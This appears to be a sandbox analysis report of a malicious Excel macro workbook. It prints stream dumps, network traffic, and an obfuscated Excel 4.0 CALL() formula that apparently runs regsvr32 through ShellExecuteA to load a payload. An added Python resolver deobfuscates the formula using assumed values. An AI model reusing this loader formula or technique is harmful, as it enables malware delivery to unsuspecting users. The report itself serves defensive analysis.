Data Raw: | 01 16 03 00 00 16 01 00 00 c8 03 00 00 fa 00 00 00 26 02 00 00 ff ff ff ff cf 03 00 00 e3 04 00 00 00 00 00 00 01 00 00 00 ba 78 c2 6b 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
Index |
VB_Name |
VB_Creatable |
Application.OnTime |
VB_Exposed |
Long) |
ResizePagess() |
VB_Customizable |
"REviewsd" |
VB_Control |
MultiPage" |
VB_TemplateDerived |
MSForms, |
False |
Attribute |
Private |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
ResizePagess |
"pages" |
VBA Code |
---|
|
VBA File Name: ThisWorkbook.cls, Stream Size: 999 |
---|
General | |
---|---|
Stream Path: | VBA/ThisWorkbook |
VBA File Name: | ThisWorkbook.cls |
Stream Size: | 999 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . x . d . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 ba 78 1c 64 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
"ThisWorkbook" |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
Streams |
---|
Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 554 |
---|
General | |
---|---|
Stream Path: | PROJECT |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 554 |
Entropy: | 5.25519546931 |
Base64 Encoded: | True |
Data ASCII: | I D = " { 4 9 3 4 E D C 8 - 1 B 9 3 - 4 5 B C - B 6 9 3 - D B B 2 9 D 5 C 1 4 7 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 3 7 3 5 C 4 1 F C C 6 1 0 7 6 5 0 7 6 5 0 7 6 5 0 7 6 5 " . . D P B = " 6 E 6 C 9 D 6 8 E 3 A 8 1 B A 9 1 B A 9 1 |
Data Raw: | 49 44 3d 22 7b 34 39 33 34 45 44 43 38 2d 31 42 39 33 2d 34 35 42 43 2d 42 36 39 33 2d 44 42 42 32 39 44 35 43 31 34 37 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4e 61 6d 65 3d |
Stream Path: PROJECTwm, File Type: data, Stream Size: 86 |
---|
General | |
---|---|
Stream Path: | PROJECTwm |
File Type: | data |
Stream Size: | 86 |
Entropy: | 3.24455457963 |
Base64 Encoded: | False |
Data ASCII: | T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . . |
Data Raw: | 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00 |
Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3574 |
---|
General | |
---|---|
Stream Path: | VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 3574 |
Entropy: | 4.46002460936 |
Base64 Encoded: | False |
Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . |
Data Raw: | cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00 |
Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2060 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_0 |
File Type: | data |
Stream Size: | 2060 |
Entropy: | 3.45134089702 |
Base64 Encoded: | False |
Data ASCII: | . K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ X . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . E . . . . . . C . _ . . . : . . . . . . . . . . |
Data Raw: | 93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00 |
Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 187 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_1 |
File Type: | data |
Stream Size: | 187 |
Entropy: | 1.91493173134 |
Base64 Encoded: | False |
Data ASCII: | r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w q . . . . . . . . . . . . . . . . n i m o . . . . . . . . . . . . . . . . y e l ^ . . . . . . . . . . . . . . . |
Data Raw: | 72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 02 00 00 00 00 00 00 08 02 00 00 00 00 00 |
Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 363 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_2 |
File Type: | data |
Stream Size: | 363 |
Entropy: | 2.21122978445 |
Base64 Encoded: | False |
Data ASCII: | r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff |
Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 398 |
---|
General | |
---|---|
Stream Path: | VBA/__SRP_3 |
File Type: | data |
Stream Size: | 398 |
Entropy: | 2.07709195049 |
Base64 Encoded: | False |
Data ASCII: | r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . |
Data Raw: | 72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 |
Stream Path: VBA/dir, File Type: data, Stream Size: 820 |
---|
General | |
---|---|
Stream Path: | VBA/dir |
File Type: | data |
Stream Size: | 820 |
Entropy: | 6.5044215585 |
Base64 Encoded: | True |
Data ASCII: | . 0 . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . - |
Data Raw: | 01 30 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 7f 90 eb 61 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47 |
Macro 4.0 Code |
---|
CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)
"=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()
The first line is the formula as the sandbox pretty-prints it; the second is the same formula rendered as a quoted string (inner quotes doubled) with =RETURN() appended. CALL() is the Excel 4.0 foreign-function interface: argument 1 names the DLL, argument 2 the exported function, argument 3 the register type string describing the parameter types, and the remaining arguments are passed to that function. Every argument is assembled at run time by concatenating (&) defined names (wegb, o0, ohgdfww, i0, v0, w00, bb, ab, ba) with short literal fragments, so no complete DLL name, export name or command line exists in the sheet for a static scanner to match. The literal fragments ("S" and "A" around ohgdfww, "CCCC", "p" and "n", "r" and "gsvr", " -s ") together with the regsvr32.exe process that EXCEL.EXE started (System Behavior below) are consistent with Shell32!ShellExecuteA being used to run regsvr32 -s <path>; the values of the defined names are not printed in this report, so that reading is an inference, not an extracted string.
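The following resolver is an added example and is not part of the Joe Sandbox report or of the sample. It tokenizes the CALL() above, splits its arguments, and evaluates each & concatenation with a table of defined-name values. Those values (wegb = "Shell", o0 = "32", ohgdfww = "hellExecute", i0 = "J", v0 = "o", w00 = "e") are assumptions chosen to agree with the literal fragments and the observed regsvr32.exe launch; the report does not show them. bb, ab and ba are left out on purpose, so the output shows how unresolved names are flagged rather than guessed. The second constant is the report's quoted rendering, which the example unwraps to the same formula.

```python
import re
from typing import Dict, List, Tuple

# The CALL() exactly as printed in the report's "Macro 4.0 Code" section.
XLM_CALL = ('CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, '
            'v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)')
# The report's second rendering: quoted, inner quotes doubled, =RETURN() appended.
QUOTED_CELL = ('"=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",'
               '""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()')

# ASSUMED values for the defined names: the report does not print them. They are
# chosen to agree with the literal fragments and with the regsvr32.exe process
# that EXCEL.EXE started. bb, ab, ba (the DLL path) are left out on purpose so
# the resolver reports the gap instead of guessing.
ASSUMED_NAMES = {"wegb": "Shell", "o0": "32", "ohgdfww": "hellExecute",
                 "i0": "J", "v0": "o", "w00": "e"}

# XLM subset used here: quoted strings ("" escapes a quote), names, integers, & ( ) ,
_TOKEN = re.compile(r'\s*(?:("(?:[^"]|"")*")|([A-Za-z_][A-Za-z0-9_.]*)|(\d+)|([&(),]))')

def tokenize(expr: str) -> List[Tuple[str, str]]:
    expr, pos, out = expr.strip(), 0, []
    while pos < len(expr):
        m = _TOKEN.match(expr, pos)
        if m is None:
            raise ValueError(f"cannot tokenize at offset {pos}: {expr[pos:pos + 12]!r}")
        pos = m.end()
        s, name, num, punct = m.groups()
        if s is not None:
            out.append(("str", s[1:-1].replace('""', '"')))
        elif name is not None:
            out.append(("name", name))
        elif num is not None:
            out.append(("num", num))
        else:
            out.append(("punct", punct))
    return out

def unwrap_quoted_formula(line: str) -> str:
    """Turn "=CALL(...)"=RETURN() back into CALL(...)."""
    if not line.startswith('"'):
        return line.lstrip("=")
    i = 1
    while i < len(line):
        if line[i] == '"':
            if line[i + 1:i + 2] == '"':   # doubled quote is a literal quote, keep scanning
                i += 2
                continue
            break                           # closing quote of the formula string
        i += 1
    return line[1:i].replace('""', '"').lstrip("=")

def split_call_args(tokens: List[Tuple[str, str]]) -> List[List[Tuple[str, str]]]:
    """Comma-separated argument token lists of CALL(...), nesting respected."""
    if tokens[:2] != [("name", "CALL"), ("punct", "(")]:
        raise ValueError("expected CALL(")
    args, cur, depth = [], [], 0
    for kind, val in tokens[2:]:
        if kind == "punct":
            if val == "(":
                depth += 1
            elif val == ")":
                if depth == 0:
                    break
                depth -= 1
            elif val == "," and depth == 0:
                args.append(cur)
                cur = []
                continue
        cur.append((kind, val))
    args.append(cur)
    return args

def resolve_concat(arg: List[Tuple[str, str]], names: Dict[str, str]) -> Tuple[str, List[str]]:
    """Evaluate a & "b" & c: literals kept, names looked up, unknown names left as {name}."""
    parts, unresolved = [], []
    for kind, val in arg:
        if kind == "punct" and val == "&":
            continue
        if kind in ("str", "num"):
            parts.append(val)
        elif kind == "name":
            parts.append(names.get(val, "{" + val + "}"))
            if val not in names:
                unresolved.append(val)
        else:
            raise ValueError(f"unsupported token {kind} {val!r} in concatenation")
    return "".join(parts), unresolved

def decode_call(formula: str, names: Dict[str, str]) -> Dict[str, object]:
    """Resolve CALL(dll, export, register-type string, args...) into its fields
    and list the defined names whose value is still unknown."""
    resolved = [resolve_concat(a, names) for a in split_call_args(tokenize(formula))]
    values = [v for v, _ in resolved]
    if len(values) < 3:
        raise ValueError("CALL needs at least dll, export and type string")
    return {"dll": values[0], "export": values[1], "types": values[2],
            "args": values[3:], "unresolved": sorted({n for _, u in resolved for n in u})}

if __name__ == "__main__":
    print(decode_call(XLM_CALL, ASSUMED_NAMES))
    print(decode_call(unwrap_quoted_formula(QUOTED_CELL), {}))
```

With the assumed table the call resolves to dll "Shell32", export "ShellExecuteA", type string "JJCCCCJ" and the arguments 0, "open", "regsvr32", " -s {bb}{ab}{ba}", 0, 0, with bb, ab and ba reported as unresolved. Running it with an empty table lists all nine names, which is the list of defined names an analyst would then pull from the workbook's name table to complete the command line.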
OLE File "/opt/package/joesandbox/database/analysis/338158/sample/sample20210111-01.xlsm" (second OLE container in the sample: the embedded Microsoft Forms 2.0 MultiPage object, see its \x1CompObj stream below) |
---|
Indicators | |
---|---|
Has Summary Info: | False |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | False |
Summary | |
---|---|
Author: | |
Last Saved By: | |
Create Time: | 2020-12-07T14:38:21Z |
Last Saved Time: | 2021-01-11T13:42:02Z |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Thumbnail Scaling Desired: | false |
Company: | |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 16.0300 |
Streams |
---|
Stream Path: \x1CompObj, File Type: data, Stream Size: 115 |
---|
General | |
---|---|
Stream Path: | \x1CompObj |
File Type: | data |
Stream Size: | 115 |
Entropy: | 4.80096587863 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . p . . F z ? . . . . . . . a . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . M u l t i P a g e . 1 . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 70 13 e3 46 7a 3f ce 11 be d6 00 aa 00 61 10 80 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 12 00 00 00 46 6f 72 6d 73 2e 4d 75 6c 74 69 50 61 67 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: f, File Type: data, Stream Size: 178 |
---|
General | |
---|---|
Stream Path: | f |
File Type: | data |
Stream Size: | 178 |
Entropy: | 2.59766210867 |
Base64 Encoded: | False |
Data ASCII: | . . $ . H . . . . . . . . @ . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . . . . . . . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . # . . . . . . . P a g e 1 . . . . . . . . . . . . . $ . . . . . . . . . . . . . ! . . . . . . . P a g e 2 . . . 5 . . . . . . . . . . . . . . . T . . . |
Data Raw: | 00 04 24 00 48 0c 00 0c 03 00 00 00 04 40 00 00 04 00 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 74 00 00 00 00 83 01 b0 00 00 1c 00 f4 01 00 00 01 00 00 00 32 00 00 00 98 00 00 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 24 00 d5 01 00 00 05 00 00 80 02 00 00 00 23 00 04 00 01 00 07 00 50 61 67 65 31 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: i02/\x1CompObj, File Type: data, Stream Size: 110 |
---|
General | |
---|---|
Stream Path: | i02/\x1CompObj |
File Type: | data |
Stream Size: | 110 |
Entropy: | 4.63372611993 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: i02/f, File Type: data, Stream Size: 40 |
---|
General | |
---|---|
Stream Path: | i02/f |
File Type: | data |
Stream Size: | 40 |
Entropy: | 1.54176014818 |
Base64 Encoded: | False |
Data ASCII: | . . . . @ . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: i02/o, File Type: empty, Stream Size: 0 |
---|
General | |
---|---|
Stream Path: | i02/o |
File Type: | empty |
Stream Size: | 0 |
Entropy: | 0.0 |
Base64 Encoded: | False |
Data ASCII: | |
Data Raw: |
Stream Path: i03/\x1CompObj, File Type: data, Stream Size: 110 |
---|
General | |
---|---|
Stream Path: | i03/\x1CompObj |
File Type: | data |
Stream Size: | 110 |
Entropy: | 4.63372611993 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: i03/f, File Type: data, Stream Size: 40 |
---|
General | |
---|---|
Stream Path: | i03/f |
File Type: | data |
Stream Size: | 40 |
Entropy: | 1.90677964945 |
Base64 Encoded: | False |
Data ASCII: | . . . . @ . . . . . . . . } . . n . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 6e 13 00 00 fd 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Stream Path: i03/o, File Type: empty, Stream Size: 0 |
---|
General | |
---|---|
Stream Path: | i03/o |
File Type: | empty |
Stream Size: | 0 |
Entropy: | 0.0 |
Base64 Encoded: | False |
Data ASCII: | |
Data Raw: |
Stream Path: o, File Type: data, Stream Size: 152 |
---|
General | |
---|---|
Stream Path: | o |
File Type: | data |
Stream Size: | 152 |
Entropy: | 2.68720470607 |
Base64 Encoded: | False |
Data ASCII: | . . p . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P a g e 1 . . . . . . . P a g e 2 . . . . . . . . . . . . . . . T a b 3 . . . . T a b 4 . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i . . . . . . . . . |
Data Raw: | 00 02 70 00 31 82 fa 00 00 00 00 00 18 00 00 00 02 00 00 00 08 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 02 00 00 00 08 00 00 00 84 00 00 00 84 00 00 00 05 00 00 80 50 61 67 65 31 00 00 00 05 00 00 80 50 61 67 65 32 00 00 00 00 00 00 00 00 00 00 00 04 00 00 80 54 61 62 33 04 00 00 80 54 61 62 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 07 00 00 80 |
Stream Path: x, File Type: data, Stream Size: 48 |
---|
General | |
---|---|
Stream Path: | x |
File Type: | data |
Stream Size: | 48 |
Entropy: | 1.42267983198 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 0c 00 06 00 00 00 02 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00 |
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 11, 2021 18:28:00.002847910 CET | 49167 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.125716925 CET | 443 | 49167 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.125803947 CET | 49167 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.138995886 CET | 49167 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.262025118 CET | 443 | 49167 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.263251066 CET | 443 | 49167 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.263308048 CET | 49167 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.264287949 CET | 49167 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.265647888 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.387058973 CET | 443 | 49167 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.388211012 CET | 443 | 49168 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.388309956 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.389369965 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.512084007 CET | 443 | 49168 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.512468100 CET | 443 | 49168 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.512512922 CET | 443 | 49168 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.512586117 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.512613058 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.526820898 CET | 49168 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.527962923 CET | 49169 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.649553061 CET | 443 | 49168 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.650635004 CET | 443 | 49169 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.650715113 CET | 49169 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.651102066 CET | 49169 | 443 | 192.168.2.22 | 199.59.242.150 |
Jan 11, 2021 18:28:00.773710012 CET | 443 | 49169 | 199.59.242.150 | 192.168.2.22 |
Jan 11, 2021 18:28:00.773785114 CET | 49169 | 443 | 192.168.2.22 | 199.59.242.150 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jan 11, 2021 18:27:59.845685959 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8 |
